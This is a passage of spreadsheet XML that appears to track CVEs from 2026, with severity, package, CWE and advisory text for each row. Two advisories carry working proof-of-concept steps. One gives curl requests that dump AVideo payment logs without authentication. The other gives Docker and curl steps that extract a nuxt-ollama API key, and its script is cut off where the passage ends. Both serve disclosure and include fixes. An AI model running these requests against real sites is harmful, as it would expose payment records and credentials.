      <c r="S1280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49947</t>
        </is>
      </c>
    </row>
    <row r="1281">
      <c r="A1281" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1281" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50024</t>
        </is>
      </c>
      <c r="D1281" s="5" t="inlineStr"/>
      <c r="E1281" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F1281" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1281" s="5" t="inlineStr"/>
      <c r="H1281" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1281" s="5" t="inlineStr"/>
      <c r="J1281" s="5" t="inlineStr"/>
      <c r="K1281" s="5" t="inlineStr"/>
      <c r="L1281" s="5" t="inlineStr">
        <is>
          <t>pip:githacker</t>
        </is>
      </c>
      <c r="M1281" s="5" t="inlineStr">
        <is>
          <t>1.1.8</t>
        </is>
      </c>
      <c r="N1281" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1281" s="5" t="inlineStr"/>
      <c r="P1281" s="5" t="inlineStr"/>
      <c r="Q1281" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-23</t>
        </is>
      </c>
      <c r="R1281"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S1281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50024</t>
        </is>
      </c>
    </row>
    <row r="1282">
      <c r="A1282" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1282" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54529</t>
        </is>
      </c>
      <c r="D1282" s="5" t="inlineStr"/>
      <c r="E1282" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F1282" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1282" s="5" t="inlineStr"/>
      <c r="H1282" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1282" s="5" t="inlineStr"/>
      <c r="J1282" s="5" t="inlineStr"/>
      <c r="K1282" s="5" t="inlineStr"/>
      <c r="L1282" s="5" t="inlineStr">
        <is>
          <t>pip:sqladmin</t>
        </is>
      </c>
      <c r="M1282" s="5" t="inlineStr">
        <is>
          <t>0.27.1</t>
        </is>
      </c>
      <c r="N1282" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1282" s="5" t="inlineStr"/>
      <c r="P1282" s="5" t="inlineStr"/>
      <c r="Q1282" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-200, CWE-248, CWE-639</t>
        </is>
      </c>
      <c r="R1282"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S1282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54529</t>
        </is>
      </c>
    </row>
    <row r="1283">
      <c r="A1283" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1283" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54920</t>
        </is>
      </c>
      <c r="D1283" s="5" t="n">
        <v>0</v>
      </c>
      <c r="E1283" s="5" t="inlineStr">
        <is>
          <t>NONE</t>
        </is>
      </c>
      <c r="F1283" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1283" s="5" t="inlineStr"/>
      <c r="H1283" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1283" s="5" t="inlineStr"/>
      <c r="J1283" s="5" t="inlineStr"/>
      <c r="K1283" s="5" t="inlineStr"/>
      <c r="L1283" s="5" t="inlineStr"/>
      <c r="M1283" s="5" t="inlineStr"/>
      <c r="N1283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1283" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P1283" s="5" t="inlineStr"/>
      <c r="Q1283" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-824</t>
        </is>
      </c>
      <c r="R1283" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions 3.4.0 through 3.4.12, a reachable assertion failure in the HTJ2K decode path allows a crafted HTJ2K-compressed EXR file to cause an unconditional process abort in any application that calls exr_start_read() on untrusted input, resulting in denial of service. The crash is triggered by a QCD marker whose lower five bits are zero, which OpenEXR passes into the vendored OpenJPH library while constructing the codestream and evaluating its quantization delta parameters. OpenJPH uses an assertion rather than a recoverable error to validate those bits, so any invalid value calls abort() directly and cannot be intercepted by surrounding error handling, a problem compounded by OpenEXR wrapping only its internal HT header parser in error handling while leaving the later codestream read and construction calls unprotected. This issue has been resolved in version 3.4.13.</t>
        </is>
      </c>
      <c r="S1283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54920</t>
        </is>
      </c>
    </row>
    <row r="1284">
      <c r="A1284" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1284" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55073</t>
        </is>
      </c>
      <c r="D1284" s="5" t="inlineStr"/>
      <c r="E1284" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F1284" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1284" s="5" t="inlineStr"/>
      <c r="H1284" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1284" s="5" t="inlineStr"/>
      <c r="J1284" s="5" t="inlineStr"/>
      <c r="K1284" s="5" t="inlineStr"/>
      <c r="L1284" s="5" t="inlineStr">
        <is>
          <t>pip:weasyprint</t>
        </is>
      </c>
      <c r="M1284" s="5" t="inlineStr">
        <is>
          <t>70.0</t>
        </is>
      </c>
      <c r="N1284" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1284" s="5" t="inlineStr"/>
      <c r="P1284" s="5" t="inlineStr"/>
      <c r="Q1284" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1284"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S1284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55073</t>
        </is>
      </c>
    </row>
    <row r="1285">
      <c r="A1285" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1285" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55891</t>
        </is>
      </c>
      <c r="D1285" s="5" t="n">
        <v>0</v>
      </c>
      <c r="E1285" s="5" t="inlineStr">
        <is>
          <t>NONE</t>
        </is>
      </c>
      <c r="F1285" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1285" s="5" t="inlineStr"/>
      <c r="H1285" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1285" s="5" t="inlineStr"/>
      <c r="J1285" s="5" t="inlineStr"/>
      <c r="K1285" s="5" t="inlineStr"/>
      <c r="L1285" s="5" t="inlineStr"/>
      <c r="M1285" s="5" t="inlineStr"/>
      <c r="N1285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1285" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P1285" s="5" t="inlineStr"/>
      <c r="Q1285" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="R1285" s="5" t="inlineStr">
        <is>
          <t>PrivateBin is an online pastebin where the server has zero knowledge of pasted data. Prior to 2.0.5, Request::getRequestUri() in lib/Request.php passes $_SERVER['REQUEST_URI'] through FILTER_SANITIZE_URL, which does not remove quotation marks, angle brackets, or apostrophes, and Controller::_init() stores the attacker-controlled value in Controller::$_urlBase. Controller::_jsonld() in lib/Controller.php then uses str_replace() to insert that value without JSON escaping into js/types.jsonld, js/paste.jsonld, and the other JSON-LD templates used by /?jsonld= and /?pasteid. A raw quotation mark delivered by an HTTP client, proxy, or structured-data crawler that does not normalize the request target can break out of the JSON string and inject arbitrary key-value data into a CORS-open application/ld+json response. The jsonld branch in Controller::__construct() returns before _setCacheHeaders(), so the response also lacks X-Content-Type-Options: nosniff, Content Security Policy, X-Frame-Options, and Referrer-Policy. Direct script execution was not demonstrated, but manipulated responses can affect structured-data consumers or combine with less strict clients. This issue is fixed in version 2.0.5.</t>
        </is>
      </c>
      <c r="S1285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55891</t>
        </is>
      </c>
    </row>
    <row r="1286">
      <c r="A1286" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56125</t>
        </is>
      </c>
      <c r="D1286" s="5" t="inlineStr"/>
      <c r="E1286" s="5" t="inlineStr"/>
      <c r="F1286" s="5" t="inlineStr"/>
      <c r="G1286" s="5" t="inlineStr"/>
      <c r="H1286" s="5" t="inlineStr"/>
      <c r="I1286" s="5" t="inlineStr"/>
      <c r="J1286" s="5" t="inlineStr"/>
      <c r="K1286" s="5" t="inlineStr"/>
      <c r="L1286" s="5" t="inlineStr"/>
      <c r="M1286" s="5" t="inlineStr"/>
      <c r="N1286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1286" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1286" s="5" t="inlineStr"/>
      <c r="Q1286" s="5" t="inlineStr"/>
      <c r="R1286" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="S1286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56125</t>
        </is>
      </c>
    </row>
    <row r="1287">
      <c r="A1287" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1287" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56341</t>
        </is>
      </c>
      <c r="D1287" s="5" t="inlineStr"/>
      <c r="E1287" s="5" t="inlineStr"/>
      <c r="F1287" s="5" t="inlineStr"/>
      <c r="G1287" s="5" t="inlineStr"/>
      <c r="H1287" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1287" s="5" t="inlineStr"/>
      <c r="J1287" s="5" t="inlineStr"/>
      <c r="K1287" s="5" t="inlineStr"/>
      <c r="L1287" s="5" t="inlineStr">
        <is>
          <t>composer:wwbn/avideo</t>
        </is>
      </c>
      <c r="M1287" s="5" t="inlineStr"/>
      <c r="N1287" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1287" s="5" t="inlineStr"/>
      <c r="P1287" s="5" t="inlineStr"/>
      <c r="Q1287" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862</t>
        </is>
      </c>
      <c r="R1287" s="5" t="inlineStr">
        <is>
          <t>## Summary
Multiple payment plugin `list.json.php` endpoints lack authentication and authorization checks, allowing unauthenticated attackers to retrieve all payment transaction records including PayPal billing agreement IDs, Express Checkout tokens, Authorize.Net webhook payloads with transaction details, and Bitcoin payment records. This is the same class of vulnerability fixed in the Scheduler plugin (GHSA-j724-5c6c-68g5 / commit 83390ab1f) but the fix was not applied to the remaining 21 affected endpoints.
## Details
The AVideo ObjectYPT admin CRUD pattern generates four endpoints per database table: `add.json.php`, `delete.json.php`, `list.json.php`, and an `index.php` page. In the payment plugins, `add.json.php` and `delete.json.php` correctly check `User::isAdmin()` before proceeding, but the `list.json.php` endpoints have no authorization check whatsoever.
**PayPalYPT_log list endpoint** (`plugin/PayPalYPT/View/PayPalYPT_log/list.json.php:1-10`):
```php
&lt;?php
require_once '../../../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/PayPalYPT/Objects/PayPalYPT_log.php';
header('Content-Type: application/json');
$rows = PayPalYPT_log::getAll();
$total = PayPalYPT_log::getTotal();
?&gt;
{"data": &lt;?php echo json_encode($rows); ?&gt;, ...}
```
No `User::isAdmin()` check. The `getAll()` method (inherited from `ObjectYPT`) executes `SELECT * FROM PayPalYPT_log` returning all records.
**Contrast with the sibling add endpoint** (`plugin/PayPalYPT/View/PayPalYPT_log/add.json.php:13-16`):
```php
if (!User::isAdmin()) {
    $obj-&gt;msg = "You can't do this";
    die(json_encode($obj));
}
```
The `configuration.php` bootstrap file performs no global authentication gating — it initializes the application framework but does not enforce auth. No `.htaccess` rules restrict access to plugin View directories.
**Data model** (`plugin/PayPalYPT/Objects/PayPalYPT_log.php`): Each record contains `agreement_id`, `users_id`, `json` (full PayPal API response), `recurring_payment_id`, `value` (payment amount), and `token` (PayPal Express Checkout token).
The identical pattern exists in:
- `plugin/AuthorizeNet/View/Anet_webhook_log/list.json.php` — full Authorize.Net webhook payloads
- `plugin/BTCPayments/View/Btc_payments/list.json.php` — Bitcoin transaction identifiers and amounts
This was the exact same vulnerability class patched in commit 83390ab1f for the Scheduler plugin (GHSA-j724-5c6c-68g5), but the fix was only applied to the 3 Scheduler endpoints. A total of 21 `list.json.php` endpoints across the codebase remain unprotected.
## PoC
**Step 1 — Dump PayPal transaction logs (unauthenticated):**
```bash
curl -s 'https://target.com/plugin/PayPalYPT/View/PayPalYPT_log/list.json.php'
```
Returns all PayPal transaction records including agreement IDs, tokens, payment amounts, user IDs, and full PayPal API JSON responses.
**Step 2 — Dump Authorize.Net webhook logs (unauthenticated):**
```bash
curl -s 'https://target.com/plugin/AuthorizeNet/View/Anet_webhook_log/list.json.php'
```
Returns all Authorize.Net webhook payloads including transaction IDs, event types, and payment details.
**Step 3 — Dump Bitcoin payment records (unauthenticated):**
```bash
curl -s 'https://target.com/plugin/BTCPayments/View/Btc_payments/list.json.php'
```
Returns all Bitcoin transaction identifiers, BTC amounts, and store identifiers.
**Step 4 — Confirm sibling endpoints ARE protected:**
```bash
curl -s -X POST 'https://target.com/plugin/PayPalYPT/View/PayPalYPT_log/add.json.php'
# Returns: {"error":true,"msg":"You can't do this"}
```
## Impact
- **Financial data exposure:** Unauthenticated attackers can retrieve all payment transaction records across PayPal, Authorize.Net, and Bitcoin payment providers.
- **Token leakage:** PayPal Express Checkout tokens and billing agreement IDs are exposed, potentially enabling payment manipulation or account correlation.
- **PII leakage:** Transaction records contain user ID mappings, payment amounts, and full API responses that may include payer email addresses and names.
- **Broad scope:** 21 total `list.json.php` endpoints lack auth, also exposing live streaming server infrastructure (`Live_servers`), user connection data, meeting participation logs, and AI transcription responses.
- **Zero interaction required:** No authentication, no user interaction — a single GET request dumps the entire table.
## Recommended Fix
Add `User::isAdmin()` checks to all unprotected `list.json.php` endpoints, matching the pattern used in the Scheduler fix (commit 83390ab1f). For each affected file, add immediately after the `require_once` and `header()` lines:
```php
if (!User::isAdmin()) {
    $obj = new stdClass();
    $obj-&gt;error = true;
    $obj-&gt;msg = "You can't do this";
    die(json_encode($obj));
}
```
The full list of files requiring this fix:
1. `plugin/PayPalYPT/View/PayPalYPT_log/list.json.php`
2. `plugin/AuthorizeNet/View/Anet_webhook_log/list.json.php`
3. `plugin/BTCPayments/View/Btc_payments/list.json.php`
4. `plugin/AI/View/Ai_responses/list.json.php`
5. `plugin/AI/View/Ai_metatags_responses/list.json.php`
6. `plugin/AI/View/Ai_transcribe_responses/list.json.php`
7. `plugin/Live/view/Live_servers/list.json.php`
8. `plugin/Live/view/Live_schedule/list.json.php`
9. `plugin/Live/view/Live_restreams_logs/list.json.php`
10. `plugin/SocialMediaPublisher/View/Publisher_schedule/list.json.php`
11. `plugin/SocialMediaPublisher/View/Publisher_social_medias/list.json.php`
12. `plugin/Meet/View/Meet_join_log/list.json.php`
13. `plugin/Meet/View/Meet_schedule_has_users_groups/list.json.php`
14. `plugin/PlayLists/View/Playlists_schedules/list.json.php`
15. `plugin/UserConnections/View/Users_connections/list.json.php`
16. `plugin/UserNotifications/View/User_notifications/list.json.php`
17. `plugin/VideosStatistics/View/Statistics/list.json.php`
18. `plugin/VideoTags/View/Tags_subscriptions/list.json.php`
19. `plugin/CustomizeUser/View/Categories_has_users_groups/list.json.php`
20. `plugin/CustomizeUser/View/Users_extra_info/list.json.php`
21. `plugin/ImageGallery/list.json.php`</t>
        </is>
      </c>
      <c r="S1287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56341</t>
        </is>
      </c>
    </row>
    <row r="1288">
      <c r="A1288" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1288" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59157</t>
        </is>
      </c>
      <c r="D1288" s="5" t="inlineStr"/>
      <c r="E1288" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F1288" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1288" s="5" t="inlineStr"/>
      <c r="H1288" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1288" s="5" t="inlineStr"/>
      <c r="J1288" s="5" t="inlineStr"/>
      <c r="K1288" s="5" t="inlineStr"/>
      <c r="L1288" s="5" t="inlineStr">
        <is>
          <t>go:github.com/ncarlier/webhookd</t>
        </is>
      </c>
      <c r="M1288" s="5" t="inlineStr">
        <is>
          <t>1.22.0</t>
        </is>
      </c>
      <c r="N1288" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1288" s="5" t="inlineStr"/>
      <c r="P1288" s="5" t="inlineStr"/>
      <c r="Q1288" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-807</t>
        </is>
      </c>
      <c r="R1288" s="5" t="inlineStr">
        <is>
          <t>## Description
Before 1.22, if the Basic Auth (`htpasswd`) middleware was not configured, all incoming HTTP headers were blindly forwarded to the webhook script execution environment as shell variables. While the Basic Auth middleware correctly strips the authentication header (`X-WebAuthn-User`) from the incoming request before conditionally re-injecting it on successful authentication, disabling Basic Auth left the system vulnerable if deployed behind an unhardened reverse proxy.
## Impact
If an upstream reverse proxy is not properly hardened to strip client-provided authentication headers, an attacker could manually supply these headers (e.g., `X-WebAuthn-User`). A webhook script relying on this forwarded header for privilege elevation or identity verification could therefore be exploited to bypass security controls and impersonate other users.
## Mitigation
The `WHD_ALLOWED_UPSTREAM_HEADERS` configuration setting has been introduced to enforce a strict allowlist of HTTP headers that can be converted into shell variables. 
Additionally, the default behavior has been changed to adhere to the principle of least privilege. It is no longer `*` (allow all). The default allowed headers are now restricted to standard operational headers:
`Accept,Content-Type,Content-Length,User-Agent,X-Forwarded-For`
Administrators relying on upstream authentication proxies must explicitly add their authentication headers (e.g., `WHD_ALLOWED_UPSTREAM_HEADERS="Accept,Content-Type,Content-Length,User-Agent,X-Forwarded-For,x-webauthn-user"`) to ensure they are passed to the scripts securely.</t>
        </is>
      </c>
      <c r="S1288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59157</t>
        </is>
      </c>
    </row>
    <row r="1289">
      <c r="A1289" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1289" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59158</t>
        </is>
      </c>
      <c r="D1289" s="5" t="inlineStr"/>
      <c r="E1289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1289" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1289" s="5" t="inlineStr"/>
      <c r="H1289" s="5" t="inlineStr"/>
      <c r="I1289" s="5" t="inlineStr"/>
      <c r="J1289" s="5" t="inlineStr"/>
      <c r="K1289" s="5" t="inlineStr"/>
      <c r="L1289" s="5" t="inlineStr">
        <is>
          <t>npm:nuxt-ollama</t>
        </is>
      </c>
      <c r="M1289" s="5" t="inlineStr">
        <is>
          <t>1.3.1</t>
        </is>
      </c>
      <c r="N1289" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1289" s="5" t="inlineStr"/>
      <c r="P1289" s="5" t="inlineStr"/>
      <c r="Q1289" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R1289" s="5" t="inlineStr">
        <is>
          <t>## Public Runtime Config Exposes Ollama API Key to Browser Clients
### Summary
`nuxt-ollama@1.2.26` unconditionally merges all module options — including `api_key` — into Nuxt's **public** runtime config (`runtimeConfig.public.ollama`). Nuxt serializes `runtimeConfig.public` into the SSR HTML response inside a `&lt;script&gt;` payload block (`window.__NUXT__`), making the API key visible in plaintext to any unauthenticated HTTP client that fetches the page. An attacker with no credentials can steal the Ollama cloud API key with a single HTTP GET request, then use it to make arbitrary requests to the Ollama API at the operator's expense.
### Details
The vulnerability is a design flaw in `src/module.ts`. During Nuxt module setup, the entire `_options` object — which contains `api_key` when configured for cloud Ollama as documented in `README.md:71-80` — is merged into the **public** runtime config namespace:
```ts
// src/module.ts:35-36
const currentConfig = (runtimeConfig.public.ollama ?? {}) as OllamaOptions
runtimeConfig.public.ollama = defu(currentConfig, _options)
```
Nuxt's SSR pipeline serializes `runtimeConfig.public` and embeds it in every server-rendered HTML page for client-side hydration. This results in the `api_key` appearing verbatim in the `window.__NUXT__` script block:
```html
&lt;script&gt;
window.__NUXT__={};
window.__NUXT__.config={
  public:{
    ollama:{
      protocol:"https",
      host:"api.ollama.com",
      port:"",
      proxy:false,
      api_key:"LEAKED_TEST_KEY_123"  // ← secret exposed to browser
    }
  }
}
&lt;/script&gt;
```
The browser-side composable (`src/runtime/composables/useOllama.ts`) then reads this value and sends it as an `Authorization: Bearer` header in client-side Ollama API calls:
```ts
// src/runtime/composables/useOllama.ts:6-10
const options: ModuleOptions = useRuntimeConfig().public.ollama as ModuleOptions
if (options.api_key) {
  headers.Authorization = `Bearer ${options.api_key}`
}
return new Ollama({ host, proxy: options.proxy, headers })
```
The complete data flow from source to sink:
1. `README.md:71-80` — official documentation instructs users to set `ollama.api_key` for cloud Ollama models
2. `src/module.ts:35-36` — **source**: `api_key` is merged into `runtimeConfig.public.ollama`
3. Nuxt SSR runtime — `runtimeConfig.public` is serialized into HTML `__NUXT__` payload
4. `src/runtime/composables/useOllama.ts:6` — browser composable reads `useRuntimeConfig().public.ollama`
5. `src/runtime/composables/useOllama.ts:8-10` — **sink**: `options.api_key` becomes `headers.Authorization` in client-side HTTP request
The `api_key` value is never private (i.e., placed in `runtimeConfig.ollama`) and no sanitization removes it from the public namespace before serialization.
**Recommended remediation:** Move `api_key` to the private runtime config and remove it from the browser composable:
```diff
-    const currentConfig = (runtimeConfig.public.ollama ?? {}) as OllamaOptions
-    runtimeConfig.public.ollama = defu(currentConfig, _options)
+    const { api_key, ...publicOptions } = _options
+    const currentPublicConfig = (runtimeConfig.public.ollama ?? {}) as Omit&lt;OllamaOptions, 'api_key'&gt;
+    runtimeConfig.public.ollama = defu(currentPublicConfig, publicOptions)
+    const currentPrivateConfig = (runtimeConfig.ollama ?? {}) as Pick&lt;ModuleOptions, 'api_key'&gt;
+    runtimeConfig.ollama = defu(currentPrivateConfig, { api_key })
```
The `api_key` should then only be consumed in the server-side utility (`src/runtime/server/utils/useOllama.ts`) via `useRuntimeConfig().ollama.api_key`.
### PoC
**Prerequisites:** Docker, Python 3
**Step 1 — Build the vulnerable Nuxt app container**
```bash
docker build \
  -f /path/to/vuln-001/Dockerfile \
  -t nuxt-ollama-vuln-001 \
  /path/to/npmAI_735_thoda-dev__nuxt-ollama
```
The Dockerfile uses the nuxt-ollama source at commit `6989ea8` and injects the following `playground/nuxt.config.ts` — the exact cloud configuration pattern from `README.md:71-80`:
```ts
export default defineNuxtConfig({
  modules: ['../src/module'],
  compatibilityDate: '2025-10-29',
  devtools: { enabled: false },
  ollama: {
    protocol: 'https',
    host: 'api.ollama.com',
    api_key: 'LEAKED_TEST_KEY_123'   // sentinel key
  }
})
```
**Step 2 — Start the container**
```bash
docker run -d --name nuxt-ollama-poc-001 -p 3000:3000 nuxt-ollama-vuln-001
```
**Step 3 — Retrieve the API key with a single unauthenticated HTTP request**
```bash
curl -s http://127.0.0.1:3000/ | grep -o 'api_key":"[^"]*"'
# Expected: api_key":"LEAKED_TEST_KEY_123"
```
**Automated PoC script**
```bash
python3 /path/to/vuln-001/poc.py
```
**Expected output (confirmed in dynamic reproduction):**
```
window.__NUXT__.config={
  public:{
    ollama:{
      protocol:"https",
      host:"api.ollama.com",
      port:"",
      proxy:false,
      api_key:"LEAKED_TEST_KEY_123"
    }
  }
}
```
The sentinel key `LEAKED_TEST_KEY_123` appears in the HTML body of an unauthenticated HTTP GET response, confirming the leak.
### Impact
This is a **credentials exposure** vulnerability (CWE-522). Any unauthenticated party — including passive network observers, web crawlers, or anonymous visitors — who fetches the HTML page of an application using `nuxt-ollama` with a cloud `api_key` configured can extract the API key from the `__NUXT__` script payload.
**Who is impacted:**
- **Operators/developers** who follow the official documentation to configure `ollama.api_key` for cloud Ollama models. They are unaware that the key is being published to every visitor.
- **End-users** of applications built with this module are not directly at risk, but their requests may be intercepted or the service degraded if attackers exhaust rate limits or billing quotas on the stolen key.
**Potential consequences of key theft:**
- Unauthorized use of the Ollama cloud API at the operator's cost
- Rate-limit exhaustion or quota abuse
- Data exfiltration if the compromised key has read access to stored models or conversations
- Reputational damage and service disruption for the affected application
The vulnerability does not require any special conditions beyond the operator following the documented configuration; no user interaction or prior authentication is needed by the attacker.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# syntax=docker/dockerfile:1
# VULN-001 PoC: nuxt-ollama@1.2.26 — Public Runtime Config Exposes Ollama API Key
# CWE-522: Insufficiently Protected Credentials
# CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5 High)
#
# Vulnerability mechanism:
#   src/module.ts:36 — runtimeConfig.public.ollama = defu(currentConfig, _options)
#   This places api_key into Nuxt's PUBLIC runtime config, which Nuxt serializes
#   into the SSR HTML response (__NUXT__ / __NUXT_DATA__ payload).
#   Any unauthenticated HTTP client reading the page HTML sees the API key in plaintext.
FROM node:20-alpine
# Install pnpm matching the repo's packageManager field (pnpm@10.33.4)
RUN npm install -g pnpm@10.33.4
WORKDIR /app
# Copy the nuxt-ollama source repository
COPY repo/ ./
# Install all project dependencies.
# .npmrc already sets: shamefully-hoist=true, strict-peer-dependencies=false
RUN pnpm install --frozen-lockfile
# Override playground/nuxt.config.ts: inject a sentinel api_key to simulate
# a real-world cloud Ollama deployment as documented in README.md:71-80.
# This is the exact vulnerable configuration pattern described in the docs.
RUN cat &gt; playground/nuxt.config.ts &lt;&lt; 'EOF'
export default defineNuxtConfig({
  modules: ['../src/module'],
  compatibilityDate: '2025-10-29',
  devtools: { enabled: false },
  ollama: {
    protocol: 'https',
    host: 'api.ollama.com',
    api_key: 'LEAKED_TEST_KEY_123'
  }
})
EOF
# Replace app.vue with a minimal template that does NOT make Ollama API calls.
# The api_key leak occurs in the Nuxt SSR payload, not in the visible template.
# The original playground app.vue calls useFetch('/api/ollama') which requires
# a live Ollama server; replacing it keeps this PoC self-contained.
RUN cat &gt; playground/app.vue &lt;&lt; 'EOF'
&lt;template&gt;
  &lt;div&gt;nuxt-ollama VULN-001 PoC — check Nuxt SSR payload for api_key&lt;/div&gt;
&lt;/template&gt;
EOF
# Build the playground in production SSR mode.
# During the module setup() call, src/module.ts:36 merges all _options (including
# api_key) into runtimeConfig.public.ollama. At request time, Nuxt serializes
# runtimeConfig.public into the HTML response for client-side hydration.
RUN pnpm exec nuxi build playground
EXPOSE 3000
ENV HOST=0.0.0.0
ENV PORT=3000
ENV NITRO_HOST=0.0.0.0
ENV NITRO_PORT=3000
CMD ["node", "/app/playground/.output/server/index.mjs"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
VULN-001 Proof of Concept
Package : nuxt-ollama@1.2.26 (thoda-dev/nuxt-ollama, commit 6989ea8)
Title   : Public Runtime Config Exposes Ollama API Key to Browser Clients
CWE     : CWE-522 - Insufficiently Protected Credentials
CVSS    : 7.5 High  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack summary
--------------
When a Nuxt app installs nuxt-ollama and sets ollama.api_key (per README.md:71-80
for cloud Ollama), the module's setup() function in src/module.ts:36 merges the
entire _options object—api_key included—into runtimeConfig.public.ollama.
